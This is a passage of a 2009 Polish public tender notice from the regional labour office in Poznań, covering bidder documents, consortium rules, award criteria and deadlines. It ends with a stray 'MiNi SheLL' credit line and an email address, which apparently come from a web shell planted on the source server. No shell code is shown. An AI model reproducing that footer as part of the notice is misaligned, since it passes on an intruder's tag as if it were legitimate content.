8. Wykonawca musi przedstawić Kierownika projektu, który posiada minimum roczne doświadczenie na podobnym stanowisku tj. nadzorowanie badań, pełnienie obowiązków kierownika badań (załącznik nr 4 do formularza oferty).
9. Pełnomocnictwa (pełnomocnictw) dołączonego-ych w formie oryginału lub notarialnie poświadczonej kopii albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, jeśli oferta będzie podpisana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, tj.:
9.1 wykonawców działających w formie spółki cywilnej, jeżeli z dokumentów dołączonych do oferty np. umowy spółki (czy jej kopii poświadczonej odpowiednio za zgodność z oryginałem) nie wynika odpowiedni dla podpisania oferty, bądź wynika inny sposób reprezentacji; 
9.2 wykonawców występujących wspólnie, czyli uczestników konsorcjum. 
10. Dokumenty, o których mowa w rozdziale 6) specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę-y uprawnioną/e do reprezentowania Wykonawcy.
11. Każdy z członków konsorcjum przedstawia dokumenty wymienione w rozdziale 6) pkt 1, 2, 3, 4. Dokumenty określone w rozdziale 6) pkt 5, 6, 7, 8  przedstawia co najmniej jeden  z Wykonawców tworzących konsorcjum.
12. W przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą, 
w miejsce dokumentów, o których mowa w rozdziale 6) pkt 2, 3, 4 SIWZ zobowiązany jest przedłożyć dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że: 
12.1 nie otwarto jego likwidacji ani nie ogłoszono upadłości, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 
12.2 nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
12.3 nie orzeczono wobec niego zakazu ubiegania się o zamówienie, (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert); 
13. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
14. Dokumenty, o których mowa w rozdziale 6) pkt.12. SIWZ muszą być złożone 
w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski i poświadczonych przez wykonawcę za zgodność z oryginałem. 
15. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Sposób realizacji badania - 60</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Poznaniu,
ul. Kościelna 37
60-537 Poznań
IIp. pok.33..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Poznaniu,
ul. Kościelna 37
60-537 Poznań.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 25.08.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com